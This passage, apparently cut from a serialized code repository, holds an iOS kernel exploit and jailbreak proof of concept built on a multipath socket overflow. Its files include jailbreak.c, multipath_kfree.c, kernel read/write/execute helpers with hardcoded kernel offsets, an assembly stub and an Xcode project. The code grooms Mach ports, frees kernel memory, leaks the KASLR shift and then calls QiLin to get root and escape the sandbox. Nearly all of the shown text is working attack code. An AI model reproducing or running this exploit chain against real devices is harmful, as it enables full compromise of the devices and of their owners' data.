_kaslr_shift;\n    kx3(copyout, addr, userspace, n);\n}\n\nuint32_t kread32(uint64_t addr)\n{\n    uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n    uint32_t value = 0;\n    kx3(copyout, addr, (uint64_t)&value, sizeof(value));\n    \n    return value;\n}\n\nuint64_t kread64(uint64_t addr)\n{\n    uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n    uint64_t value = 0;\n    kx3(copyout, addr, (uint64_t)&value, sizeof(value));\n    \n    return value;\n}\n\nvoid kwrite(uint64_t addr, uint8_t *userspace, int n)\n{\n    uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n    kx3(copyin, userspace, 
addr, n);\n}\n\nvoid kwrite32(uint64_t addr, uint32_t value)\n{\n    uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n    kx3(copyin, &value, addr, sizeof(value));\n}\n\nvoid kwrite64(uint64_t addr, uint64_t value)\n{\n    uint64_t copyin = 0xfffffff0071f5058 + _kaslr_shift;\n    kx3(copyin, &value, addr, sizeof(value));\n}\n"
  },
  {
    "path": "extra_recipe/extra_recipe_utils.h",
    "content": "//\n//  extra_recipe_utils.h\n//  multipath_kfree\n//\n//  Created by John Åkerblom on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#ifndef extra_recipe_utils_h\n#define extra_recipe_utils_h\n\n#include <mach/mach.h>\n#include <stdint.h>\n\nmach_port_t prealloc_port(int size);\nvoid prepare_prealloc_port(mach_port_t port);\nvoid send_prealloc_msg(mach_port_t port, uint64_t* buf, int n);\nuint64_t* receive_prealloc_msg(mach_port_t port);\n\ntypedef mach_port_t io_service_t;\ntypedef mach_port_t io_connect_t;\nio_connect_t alloc_userclient();\n\n// Kernel RWX\n\nvoid kx_setup(io_connect_t *ucs, mach_port_t *lazy_ports, uint64_t kaslr_shift, uint64_t kernel_buffer_base);\nvoid kx3(uint64_t fptr, uint64_t arg0, uint64_t arg1, uint64_t arg2);\n\nvoid kread(uint64_t addr, uint8_t *userspace, int n);\nuint32_t kread32(uint64_t addr);\nuint64_t kread64(uint64_t addr);\n\nvoid kwrite(uint64_t addr, uint8_t *userspace, int n);\nvoid kwrite32(uint64_t addr, uint32_t value);\nvoid kwrite64(uint64_t addr, uint64_t value);\n\n#endif /* extra_recipe_utils_h */\n"
  },
  {
    "path": "extra_recipe/jailbreak.c",
    "content": "//\n//  jailbreak.c\n//  multipath_kfree\n//\n//  Created by John Åkerblom on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#include \"jailbreak.h\"\n#include \"extra_recipe_utils.h\"\n#include \"multipath_kfree.h\"\n#include \"QiLin.h\"\n\n#include <sys/socket.h>\n#include <sys/mman.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#ifndef AF_MULTIPATH\n#define AF_MULTIPATH 39\n#endif\n\n#define MP_SOCK_COUNT 0x10\n#define FIRST_PORTS_COUNT 100\n#define REFILL_PORTS_COUNT 100\n#define TOOLAZY_PORTS_COUNT 1000\n#define REFILL_USERCLIENTS_COUNT 1000\n#define MAX_PEEKS 30000\n\nstatic void _init_port_with_empty_msg(mach_port_t port)\n{\n    uint8_t buf[256];\n    memset(buf, 0x00, sizeof(buf));\n    prepare_prealloc_port(port);\n    send_prealloc_msg(port, (uint64_t *)buf, 30);\n}\n\nstatic int _is_port_corrupt(mach_port_t port)\n{\n    kern_return_t err;\n    mach_port_seqno_t msg_seqno = 0;\n    mach_msg_size_t msg_size = 0;\n    mach_msg_id_t msg_id = 0;\n    mach_msg_trailer_t msg_trailer; // NULL trailer\n    mach_msg_type_number_t msg_trailer_size =  sizeof(msg_trailer);\n    err = mach_port_peek(mach_task_self(),\n                             port,\n                             MACH_RCV_TRAILER_NULL,\n                             &msg_seqno,\n                             &msg_size,\n                             &msg_id,\n                             (mach_msg_trailer_info_t)&msg_trailer,\n                             &msg_trailer_size);\n    \n    if (msg_id && (msg_id != 0x962)) {\n        return 1;\n    }\n    \n    return 0;\n}\n\n\nstatic int __readKernelMemory(uint64_t Address, uint64_t Len, void **To)\n{\n    void *mem = malloc(Len);\n    kread(Address, mem, (int)Len);\n    *To = mem;\n    \n    return (int)Len;\n}\n\nstatic int __writeKernelMemory(uint64_t Address, uint64_t Len, void *From)\n{\n    kwrite(Address, From, (int)Len);\n    \n    return (int)Len;\n}\n\n// This will 
not enable all QiLin features - but enough for us\nvoid _init_tfp0less_qilin(uint64_t kaslr_shift)\n{\n    uint64_t kernproc = 0xfffffff0076450a8 + kaslr_shift;\n    uint64_t *m = (uint64_t *)mmap((void *)0x110000000, 0x4000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\n    \n    *m = (uint64_t)__readKernelMemory;\n    *(m + 1) = (uint64_t)__writeKernelMemory;\n    *(m + 2) = kernproc;\n}\n\nvoid post_exploitation(uint64_t kernel_base, uint64_t kaslr_shift)\n{\n    // Do Electra/QiLin/Saurik/etc stuff here\n    \n    printf(\"Post-exploitation stage, you have kernel RWX with a clear API now (extra_recipe_utils.h) so put whatever you want here (let me spell it out for you Reddit: this === tfp0). There is no more exploitation of any vulnerabilities to be done, only mitigation bypasses of which all are public. I called this a PoC because of lack of offsets, elegant techniques, testing, reliability, documentation and so on, not because it does nothing\");\n    \n    // kwx3(0xFFFFFFFF41414141, 0x111, 0x222, 0x333); // How to use API\n    \n    // Use Jonathan Levin's QiLin to elevate prvileges and escape sandbox.\n    \n    _init_tfp0less_qilin(kaslr_shift);\n    initQiLin(0x1337, kernel_base);\n    \n    rootifyMe();\n    ShaiHuludMe(0);\n    \n    printf(\"If all went well, sandbox escaped and root achieved now, test it if you want\\n\");\n}\n\nvoid jb_go(void)\n{\n    io_connect_t refill_userclients[REFILL_USERCLIENTS_COUNT];\n    mach_port_t first_ports[FIRST_PORTS_COUNT];\n    mach_port_t refill_ports[REFILL_PORTS_COUNT];\n    mach_port_t toolazy_ports[TOOLAZY_PORTS_COUNT];\n    mach_port_t corrupt_port = 0;\n    uint64_t contained_port_addr = 0;\n    uint8_t *recv_buf = NULL;\n    uint8_t send_buf[1024];\n    \n    int mp_socks[MP_SOCK_COUNT];\n    int prealloc_size = 0x660; // kalloc.4096\n    int found = 0;\n    int peeks = 0;\n    \n    for (int i = 0; i < 10000; ++i){\n        prealloc_port(prealloc_size);\n    }\n    \n    for 
(int i = 0; i < 0x20; ++i) {\n        first_ports[i] = prealloc_port(prealloc_size);\n    }\n    \n    mp_socks[0] = socket(39, SOCK_STREAM, 0);\n    \n    // multipath_kfree(mp_sock, 0xffffffff41414141); for (;;) sleep(1); // uncomment for basic POC\n\n    for (int i = 0x20; i < FIRST_PORTS_COUNT; ++i) {\n        first_ports[i] = prealloc_port(prealloc_size);\n    }\n    \n    for (int i = 1; i < MP_SOCK_COUNT; ++i) {\n        mp_socks[i] = socket(39, SOCK_STREAM, 0);\n    }\n    \n    for (int i = 0; i < FIRST_PORTS_COUNT; ++i) {\n        _init_port_with_empty_msg(first_ports[i]);\n    }\n    \n    multipath_kfree_nearby_self(mp_socks[0], 0x0000 + 0x7a0);\n    multipath_kfree_nearby_self(mp_socks[3], 0xe000 + 0x7a0);\n\n    for (peeks = 0; peeks < MAX_PEEKS; ++peeks) {\n        for (int i = 0 ; i < FIRST_PORTS_COUNT; ++i) {\n            if (_is_port_corrupt(first_ports[i])) {\n                corrupt_port = first_ports[i];\n                printf(\"Corrupt port: %08X %d\\n\", corrupt_port, i);\n                found = 1;\n                break;\n            }\n        }\n        \n        if (found)\n            break;\n    }\n    \n    if (peeks >= MAX_PEEKS) {\n        printf(\"Didn't find corrupt port\");\n        sleep(1);\n        exit(0);\n    }\n    \n    for (int i = 0; i < REFILL_PORTS_COUNT; ++i) {\n        refill_ports[i] = prealloc_port(prealloc_size);\n    }\n    \n    for (int i = 0; i < REFILL_PORTS_COUNT; ++i) {\n        _init_port_with_empty_msg(refill_ports[i]);\n    }\n\n    recv_buf = (uint8_t *)receive_prealloc_msg(corrupt_port);\n    \n    contained_port_addr = *(uint64_t *)(recv_buf + 0x1C);\n    printf(\"refill port is at %p\\n\", (void *)contained_port_addr);\n    \n    memset(send_buf, 0, sizeof(send_buf));\n    send_prealloc_msg(corrupt_port, (uint64_t *)send_buf, 30);\n    \n    multipath_kfree(contained_port_addr);\n    \n    for (;;) {\n        if (_is_port_corrupt(corrupt_port)) {\n            break;\n        }\n    }\n    \n    for 
(int i = 0; i < REFILL_USERCLIENTS_COUNT; ++i) {\n        refill_userclients[i] = alloc_userclient();\n    }\n    \n    recv_buf = (uint8_t *)receive_prealloc_msg(corrupt_port);\n    \n    uint64_t vtable = *(uint64_t *)(recv_buf + 0x14);\n    uint64_t kaslr_shift = vtable - 0xfffffff006fdd978;\n    printf(\"AGXCommandQueue vtable: %p\\n\", (void *)vtable);\n    printf(\"kaslr shift: %p\\n\", (void *)kaslr_shift);\n    \n    // Out of everything not done properly in this POC, this is\n    // not done properly the most\n    mach_port_destroy(mach_task_self(), corrupt_port);\n    for (int i = 0; i < TOOLAZY_PORTS_COUNT; ++i) {\n        toolazy_ports[i] = prealloc_port(prealloc_size-0x28); // Not even really aligned because lazy\n    }\n\n    kx_setup(refill_userclients, toolazy_ports, kaslr_shift, contained_port_addr);\n    \n    uint64_t kernel_base = 0xfffffff007004000 + kaslr_shift;\n    uint32_t val = kread32(kernel_base);\n    \n    printf(\"kernelbase DWORD: %08X\\n\", val);\n    \n    post_exploitation(kernel_base, kaslr_shift);\n    \n    printf(\"Done\\n\");\n    for (;;)\n        sleep(1);\n}\n"
  },
  {
    "path": "extra_recipe/jailbreak.h",
    "content": "//\n//  jailbreak.h\n//  multipath_kfree\n//\n//  Created by John Åkerblom on 6/1/18.\n//\n\n#ifndef jailbreak_h\n#define jailbreak_h\n\nvoid jb_go(void);\n\n#endif /* jailbreak_h */\n"
  },
  {
    "path": "extra_recipe/load_regs_and_crash.s",
    "content": "; This code is lifted from extra_recipe by Ian Beer of Google Project Zero:\n.text\n.globl  _load_regs_and_crash\n.align  2\n_load_regs_and_crash:\nmov x30, x0\nldp x0, x1, [x30, 0]\nldp x2, x3, [x30, 0x10]\nldp x4, x5, [x30, 0x20]\nldp x6, x7, [x30, 0x30]\nldp x8, x9, [x30, 0x40]\nldp x10, x11, [x30, 0x50]\nldp x12, x13, [x30, 0x60]\nldp x14, x15, [x30, 0x70]\nldp x16, x17, [x30, 0x80]\nldp x18, x19, [x30, 0x90]\nldp x20, x21, [x30, 0xa0]\nldp x22, x23, [x30, 0xb0]\nldp x24, x25, [x30, 0xc0]\nldp x26, x27, [x30, 0xd0]\nldp x28, x29, [x30, 0xe0]\nbrk 0\n.align  3\n"
  },
  {
    "path": "extra_recipe/main.m",
    "content": "//\n//  main.m\n//  multipath_kfree\n//\n//  Created by q on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n#import \"AppDelegate.h\"\n\nint main(int argc, char * argv[]) {\n    @autoreleasepool {\n        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n    }\n}\n"
  },
  {
    "path": "extra_recipe/multipath_kfree.c",
    "content": "//\n//  multipath_kfree.h\n//  multipath_kfree\n//\n//  Created by John Åkerblom on 6/1/18.\n//\n\n#include \"multipath_kfree.h\"\n\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#ifndef AF_MULTIPATH\n#define AF_MULTIPATH 39\n#endif\n\n#define MULTIPATH_ERRNO_CHECK // Enable rudimentary error checking. Not thread-safe.\n#ifdef MULTIPATH_ERRNO_CHECK\n#include <errno.h>\n#endif\n\n#pragma pack(push, 1)\nstruct not_todescos_not_essers_ipc_object\n{\n    uint8_t zeroes[132-88];     // Unused by us\n    uint32_t mpte_itfinfo_size; // If > 4, ->mpte_itfinfo free'd\n    uint8_t nonzeroes[168-136]; // Unused by us\n    uint8_t nonzeroes2[16];     // Unused by us\n    uint64_t mpte_itfinfo;      // Address to free\n};\n#pragma pack(pop)\n\nstatic void _multipath_connectx_overflow(int sock, void *buf, size_t n)\n{\n    struct sockaddr_in *sa_dst = calloc(1, 0x4000);\n    memset(sa_dst, 0x0, 0x4000);\n    memcpy(sa_dst, buf, n);\n    sa_dst->sin_family = AF_UNSPEC;\n    sa_dst->sin_len = n;\n    \n    struct sockaddr_in sa_src;\n    memset(&sa_src, 0, sizeof(sa_src));\n    sa_src.sin_family = AF_INET;\n    sa_src.sin_len = 255;\n    \n    sa_endpoints_t sae;\n    sae.sae_srcif = 0;\n    sae.sae_srcaddr = (struct sockaddr *)&sa_src;\n    sae.sae_srcaddrlen = 255;\n    sae.sae_dstaddr = (struct sockaddr *)sa_dst;\n    sae.sae_dstaddrlen = (socklen_t)n;\n    \n#ifdef MULTIPATH_ERRNO_CHECK\n    errno = 0;\n#endif\n    \n    // Trigger overflow\n    connectx(sock, &sae, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);\n    \n    // We expect return value -1, errno 22 on success (but they don't guarantee it)\n    \n#ifdef MULTIPATH_ERRNO_CHECK\n    if (errno == 1) {\n        // Protip: Apple actually charges more than $100 for some regions (RIP 1000 SEK)\n        *(int *)(\"You\") = (int)\"need to pay Apple $100 (add the multipath entitlement)\";\n    }\n    else if (errno == 47) {\n  
      *(int *)(\"You\") = (int)\"need to find another bug (iOS <= 11.3.1 only)\";\n    }\n#endif\n    \n    free(sa_dst);\n}\n\nstatic void _multipath_kfree(int sock, uint64_t addr, size_t addr_size)\n{\n    struct not_todescos_not_essers_ipc_object s;\n    memset(&s, 0x00, sizeof(s));\n    memset(&s.nonzeroes, 0x42, sizeof(s.nonzeroes));\n    //memset(&_s1.nonzeroes2, 0x42, sizeof (_s.nonzeroes2)); // Irrelevant\n    s.mpte_itfinfo_size = 8; // > 4\n    s.mpte_itfinfo = addr; // Address to free\n    \n    _multipath_connectx_overflow(sock, &s, sizeof(s) - sizeof(s.mpte_itfinfo) + addr_size);\n    \n    // Close for cleanup by GC\n    close(sock);\n}\n\n/* multipath_kfree: cause GC to free a kernel address. */\nvoid multipath_kfree(uint64_t addr)\n{\n    int mp_sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);\n    _multipath_kfree(mp_sock, addr, sizeof(addr));\n}\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part)\n{\n   _multipath_kfree(mp_sock, addr_lowest_part, sizeof(addr_lowest_part));\n}\n"
  },
  {
    "path": "extra_recipe/multipath_kfree.h",
    "content": "//\n//  multipath_kfree.c\n//  multipath_kfree\n//\n//  Created by John Åkerblom on 6/1/18.\n//\n\n#include <stdint.h>\n\n#ifndef multipath_kfree_h\n#define multipath_kfree_h\n\n/* multipath_kfree: cause GC to free a kernel address. */\nvoid multipath_kfree(uint64_t addr);\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n   NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part);\n\n#endif\n"
  },
  {
    "path": "extra_recipe_extra_extra_bug.xcodeproj/project.pbxproj",
    "content": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 46;\n\tobjects = {\n\n/* Begin PBXBuildFile section */\n\t\t12242AA520C1BAF400B28377 /* multipath_kfree.c in Sources */ = {isa = PBXBuildFile; fileRef = 12242AA120C1BAF300B28377 /* multipath_kfree.c */; };\n\t\t12242AA620C1BAF400B28377 /* extra_recipe_utils.c in Sources */ = {isa = PBXBuildFile; fileRef = 12242AA220C1BAF300B28377 /* extra_recipe_utils.c */; };\n\t\t1260990B20C2C9680095B5C1 /* sha256.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990820C2C9670095B5C1 /* sha256.o */; };\n\t\t1260990C20C2C9680095B5C1 /* qilin_tfp0less.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990920C2C9670095B5C1 /* qilin_tfp0less.o */; };\n\t\t1260990D20C2C9680095B5C1 /* sha1.o in Frameworks */ = {isa = PBXBuildFile; fileRef = 1260990A20C2C9670095B5C1 /* sha1.o */; };\n\t\tB0E5165B1E39459300CE4C47 /* README in Resources */ = {isa = PBXBuildFile; fileRef = B0E5165A1E39459300CE4C47 /* README */; };\n\t\tB0F37BC11E361EAE00179E85 /* AppDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BC01E361EAE00179E85 /* AppDelegate.swift */; };\n\t\tB0F37BC31E361EAE00179E85 /* ViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BC21E361EAE00179E85 /* ViewController.swift */; };\n\t\tB0F37BC61E361EAE00179E85 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC41E361EAE00179E85 /* Main.storyboard */; };\n\t\tB0F37BC81E361EAE00179E85 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC71E361EAE00179E85 /* Assets.xcassets */; };\n\t\tB0F37BCB1E361EAE00179E85 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */; };\n\t\tB0F37BD51E361FCC00179E85 /* jailbreak.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F37BD31E361FCC00179E85 /* jailbreak.c */; };\n\t\tB0F37BDE1E37AC0700179E85 /* load_regs_and_crash.s in Sources */ = {isa = 
PBXBuildFile; fileRef = B0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */; };\n/* End PBXBuildFile section */\n\n/* Begin PBXFileReference section */\n\t\t12242A8A20C1B84900B28377 /* extra_recipe.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = extra_recipe.entitlements; sourceTree = \"<group>\"; };\n\t\t12242AA120C1BAF300B28377 /* multipath_kfree.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multipath_kfree.c; sourceTree = \"<group>\"; };\n\t\t12242AA220C1BAF300B28377 /* extra_recipe_utils.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = extra_recipe_utils.c; sourceTree = \"<group>\"; };\n\t\t12242AA320C1BAF300B28377 /* extra_recipe_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = extra_recipe_utils.h; sourceTree = \"<group>\"; };\n\t\t12242AA420C1BAF300B28377 /* multipath_kfree.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multipath_kfree.h; sourceTree = \"<group>\"; };\n\t\t1260990720C2C9670095B5C1 /* QiLin.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = QiLin.h; sourceTree = \"<group>\"; };\n\t\t1260990820C2C9670095B5C1 /* sha256.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = sha256.o; sourceTree = \"<group>\"; };\n\t\t1260990920C2C9670095B5C1 /* qilin_tfp0less.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = qilin_tfp0less.o; sourceTree = \"<group>\"; };\n\t\t1260990A20C2C9670095B5C1 /* sha1.o */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.objfile\"; path = sha1.o; sourceTree = \"<group>\"; };\n\t\tB0E5165A1E39459300CE4C47 /* README */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = README; sourceTree = \"<group>\"; };\n\t\tB0F37BBD1E361EAE00179E85 /* 
extra_recipe.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = extra_recipe.app; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\tB0F37BC01E361EAE00179E85 /* AppDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AppDelegate.swift; sourceTree = \"<group>\"; };\n\t\tB0F37BC21E361EAE00179E85 /* ViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ViewController.swift; sourceTree = \"<group>\"; };\n\t\tB0F37BC51E361EAE00179E85 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = \"<group>\"; };\n\t\tB0F37BC71E361EAE00179E85 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = \"<group>\"; };\n\t\tB0F37BCA1E361EAE00179E85 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = \"<group>\"; };\n\t\tB0F37BCC1E361EAE00179E85 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"<group>\"; };\n\t\tB0F37BD21E361FCC00179E85 /* extra_recipe-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = \"extra_recipe-Bridging-Header.h\"; sourceTree = \"<group>\"; };\n\t\tB0F37BD31E361FCC00179E85 /* jailbreak.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = jailbreak.c; sourceTree = \"<group>\"; };\n\t\tB0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.asm; path = load_regs_and_crash.s; sourceTree = \"<group>\"; };\n/* End PBXFileReference section */\n\n/* Begin PBXFrameworksBuildPhase section */\n\t\tB0F37BBA1E361EAD00179E85 /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 
2147483647;\n\t\t\tfiles = (\n\t\t\t\t1260990D20C2C9680095B5C1 /* sha1.o in Frameworks */,\n\t\t\t\t1260990C20C2C9680095B5C1 /* qilin_tfp0less.o in Frameworks */,\n\t\t\t\t1260990B20C2C9680095B5C1 /* sha256.o in Frameworks */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXFrameworksBuildPhase section */\n\n/* Begin PBXGroup section */\n\t\tB0F37BB41E361EAD00179E85 = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BBF1E361EAE00179E85 /* extra_recipe */,\n\t\t\t\tB0F37BBE1E361EAE00179E85 /* Products */,\n\t\t\t);\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tB0F37BBE1E361EAE00179E85 /* Products */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BBD1E361EAE00179E85 /* extra_recipe.app */,\n\t\t\t);\n\t\t\tname = Products;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tB0F37BBF1E361EAE00179E85 /* extra_recipe */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t12242A8A20C1B84900B28377 /* extra_recipe.entitlements */,\n\t\t\t\tB0F37BC01E361EAE00179E85 /* AppDelegate.swift */,\n\t\t\t\tB0F37BC21E361EAE00179E85 /* ViewController.swift */,\n\t\t\t\tB0F37BC41E361EAE00179E85 /* Main.storyboard */,\n\t\t\t\tB0F37BC71E361EAE00179E85 /* Assets.xcassets */,\n\t\t\t\tB0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */,\n\t\t\t\tB0F37BCC1E361EAE00179E85 /* Info.plist */,\n\t\t\t\tB0F37BD31E361FCC00179E85 /* jailbreak.c */,\n\t\t\t\tB0F37BDD1E37AC0700179E85 /* load_regs_and_crash.s */,\n\t\t\t\tB0F37BD21E361FCC00179E85 /* extra_recipe-Bridging-Header.h */,\n\t\t\t\tB0E5165A1E39459300CE4C47 /* README */,\n\t\t\t\t12242AA220C1BAF300B28377 /* extra_recipe_utils.c */,\n\t\t\t\t12242AA320C1BAF300B28377 /* extra_recipe_utils.h */,\n\t\t\t\t12242AA120C1BAF300B28377 /* multipath_kfree.c */,\n\t\t\t\t12242AA420C1BAF300B28377 /* multipath_kfree.h */,\n\t\t\t\t1260990920C2C9670095B5C1 /* qilin_tfp0less.o */,\n\t\t\t\t1260990720C2C9670095B5C1 /* QiLin.h */,\n\t\t\t\t1260990A20C2C9670095B5C1 /* sha1.o 
*/,\n\t\t\t\t1260990820C2C9670095B5C1 /* sha256.o */,\n\t\t\t);\n\t\t\tpath = extra_recipe;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n/* End PBXGroup section */\n\n/* Begin PBXNativeTarget section */\n\t\tB0F37BBC1E361EAD00179E85 /* extra_recipe */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = B0F37BCF1E361EAE00179E85 /* Build configuration list for PBXNativeTarget \"extra_recipe\" */;\n\t\t\tbuildPhases = (\n\t\t\t\tB0F37BB91E361EAD00179E85 /* Sources */,\n\t\t\t\tB0F37BBA1E361EAD00179E85 /* Frameworks */,\n\t\t\t\tB0F37BBB1E361EAD00179E85 /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t);\n\t\t\tname = extra_recipe;\n\t\t\tproductName = extra_recipe;\n\t\t\tproductReference = B0F37BBD1E361EAE00179E85 /* extra_recipe.app */;\n\t\t\tproductType = \"com.apple.product-type.application\";\n\t\t};\n/* End PBXNativeTarget section */\n\n/* Begin PBXProject section */\n\t\tB0F37BB51E361EAD00179E85 /* Project object */ = {\n\t\t\tisa = PBXProject;\n\t\t\tattributes = {\n\t\t\t\tLastSwiftUpdateCheck = 0810;\n\t\t\t\tLastUpgradeCheck = 0810;\n\t\t\t\tORGANIZATIONNAME = \"Ian Beer\";\n\t\t\t\tTargetAttributes = {\n\t\t\t\t\tB0F37BBC1E361EAD00179E85 = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 8.1;\n\t\t\t\t\t\tDevelopmentTeam = 854G7LGZ42;\n\t\t\t\t\t\tLastSwiftMigration = 0810;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tSystemCapabilities = {\n\t\t\t\t\t\t\tcom.apple.Multipath = {\n\t\t\t\t\t\t\t\tenabled = 1;\n\t\t\t\t\t\t\t};\n\t\t\t\t\t\t};\n\t\t\t\t\t};\n\t\t\t\t};\n\t\t\t};\n\t\t\tbuildConfigurationList = B0F37BB81E361EAD00179E85 /* Build configuration list for PBXProject \"extra_recipe_extra_extra_bug\" */;\n\t\t\tcompatibilityVersion = \"Xcode 3.2\";\n\t\t\tdevelopmentRegion = English;\n\t\t\thasScannedForEncodings = 0;\n\t\t\tknownRegions = (\n\t\t\t\ten,\n\t\t\t\tBase,\n\t\t\t);\n\t\t\tmainGroup = B0F37BB41E361EAD00179E85;\n\t\t\tproductRefGroup = B0F37BBE1E361EAE00179E85 /* Products 
*/;\n\t\t\tprojectDirPath = \"\";\n\t\t\tprojectRoot = \"\";\n\t\t\ttargets = (\n\t\t\t\tB0F37BBC1E361EAD00179E85 /* extra_recipe */,\n\t\t\t);\n\t\t};\n/* End PBXProject section */\n\n/* Begin PBXResourcesBuildPhase section */\n\t\tB0F37BBB1E361EAD00179E85 /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\tB0E5165B1E39459300CE4C47 /* README in Resources */,\n\t\t\t\tB0F37BCB1E361EAE00179E85 /* LaunchScreen.storyboard in Resources */,\n\t\t\t\tB0F37BC81E361EAE00179E85 /* Assets.xcassets in Resources */,\n\t\t\t\tB0F37BC61E361EAE00179E85 /* Main.storyboard in Resources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXResourcesBuildPhase section */\n\n/* Begin PBXSourcesBuildPhase section */\n\t\tB0F37BB91E361EAD00179E85 /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t12242AA620C1BAF400B28377 /* extra_recipe_utils.c in Sources */,\n\t\t\t\tB0F37BDE1E37AC0700179E85 /* load_regs_and_crash.s in Sources */,\n\t\t\t\tB0F37BD51E361FCC00179E85 /* jailbreak.c in Sources */,\n\t\t\t\t12242AA520C1BAF400B28377 /* multipath_kfree.c in Sources */,\n\t\t\t\tB0F37BC31E361EAE00179E85 /* ViewController.swift in Sources */,\n\t\t\t\tB0F37BC11E361EAE00179E85 /* AppDelegate.swift in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXSourcesBuildPhase section */\n\n/* Begin PBXVariantGroup section */\n\t\tB0F37BC41E361EAE00179E85 /* Main.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BC51E361EAE00179E85 /* Base */,\n\t\t\t);\n\t\t\tname = Main.storyboard;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tB0F37BC91E361EAE00179E85 /* LaunchScreen.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\tB0F37BCA1E361EAE00179E85 /* Base */,\n\t\t\t);\n\t\t\tname = LaunchScreen.storyboard;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n/* End 
